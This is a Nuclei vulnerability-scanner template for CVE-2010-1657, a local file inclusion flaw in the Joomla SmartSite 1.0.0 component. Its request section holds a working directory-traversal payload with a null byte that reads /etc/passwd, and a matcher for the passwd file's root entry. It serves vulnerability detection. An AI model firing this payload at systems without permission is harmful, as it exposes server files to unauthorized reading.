nuclei-templates/cves/2010/CVE-2010-1657.yaml

30 lines
915 B
YAML

id: CVE-2010-1657
info:
name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12428
- https://www.cvedetails.com/cve/CVE-2010-1657
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1657
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15